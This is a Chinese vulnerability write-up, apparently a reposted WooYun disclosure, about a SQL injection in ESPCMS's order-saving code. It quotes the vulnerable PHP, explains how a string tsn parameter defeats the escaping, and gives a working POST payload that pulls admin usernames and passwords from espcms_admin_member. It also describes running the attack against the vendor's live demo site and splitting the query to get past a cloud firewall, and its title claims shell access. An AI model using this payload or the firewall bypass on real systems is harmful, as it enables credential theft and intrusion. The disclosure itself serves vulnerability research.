易思ESPCMS sql注入漏洞(绕过阿里云盾demo站成功拿下shell)

  • A+
所属分类:漏洞时代
摘要

/interface/order.php$ptitle,$tsn都可控,直接带入insert。正常提交来看看accept()这里会把提交的数据转义,但是当$tsn不是数组的时候是这样的


漏洞作者:

路人甲

详细说明:

/interface/order.php

$db_values = '';    $arraycount = count($did) - 1;    foreach ($did as $key => $value) {     $value = intval($value);     $oprice[$key] = floatval($oprice[$key]);     $bprice[$key] = floatval($bprice[$key]);     $countprice[$key] = floatval($countprice[$key]);     $amount[$key] = intval($amount[$key]);     if ($key == $arraycount) {      $db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1)";     } else {      $db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1),";     }    }    $db_field = 'oid,did,tsn,title,oprice,bprice,countprice,amount,inventory';    $this->db->query('INSERT INTO ' . $db_table2 . ' (' . $db_field . ') VALUES ' . $db_values);

 

$ptitle,$tsn都可控,直接带入insert。

正常提交

POST /index.php?ac=order&at=ordersave HTTP/1.1 Host: demo.ecisp.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://demo.ecisp.cn/index.php?ac=order&at=orderpay Cookie: /**/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 426  userid=409&productmoney=33600&discount_productmoney=33600&discountmoney=0&tokenkey=98b9b2dbbda63c317b3f9ab9c370a47b&ptitle%5B%5D=ESPCMS%E5%BC%80%E5%8F%91%E7%89%88&tsn%5B%5D=SN20140706215345387&bprice%5B%5D=16800.00&oprice%5B%5D=16800.00&did%5B%5D=30&amount%5B%5D=2&countprice%5B%5D=33600.00&osid=1&opid=1&alias=wooyun&sex=0&email=asd%40qq.com&tel=123&mobile=123&address=test&zipcode=0&sendtime=1&content=&invpayee=&invcontent=
$ptitle = $this->fun->accept('ptitle', 'P'); $tsn = $this->fun->accept('tsn', 'P');

 

来看看accept()

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {   switch ($var) {    case 'G':     $var = &$_GET;     break;    case 'P':     $var = &$_POST;     break;

 

case 'C': $var = &$_COOKIE; break; case 'R': $var = &$_GET; if (empty($var[$k])) { $var = &$_POST; } break; } $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL; return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue; }

 

这里会把提交的数据转义,但是当$tsn不是数组的时候是这样的

$temp = "wooyun"

$temp[0]的值为w

playload构造:

$tsn参数提交一个' daddslashes(espcms重写的addslashes)将其转义成/'

取$tsn[0],为/

userid=1&productmoney=16800&discount_productmoney=16800&discountmoney=0&ptitle[]=,(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#&tsn='&bprice[]=16800.00&oprice[]=16800.00&did[]=30&amount[]=1&countprice[]=16800.00&osid=1&opid=1&alias=wooyun&sex=0&[email protected]&tel=10010&mobile=&address=china&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

查看订单:

易思ESPCMS sql注入漏洞(绕过阿里云盾demo站成功拿下shell)

sql语句相当于

INSERT INTO espcms_order_info (oid,did,tsn,title,oprice,bprice,countprice,amount,inventory) VALUES (10,30,'/',',(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#',16800,16800,16800,1,1)

 

官方DEMO测试:

由于官方demo有阿里的防火墙,我就分两次来获取

第一条 SELECT USERNAME FROM espcms_admin_member 第二条: SELECT PASSWORD FROM espcms_admin_member

易思ESPCMS sql注入漏洞(绕过阿里云盾demo站成功拿下shell)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: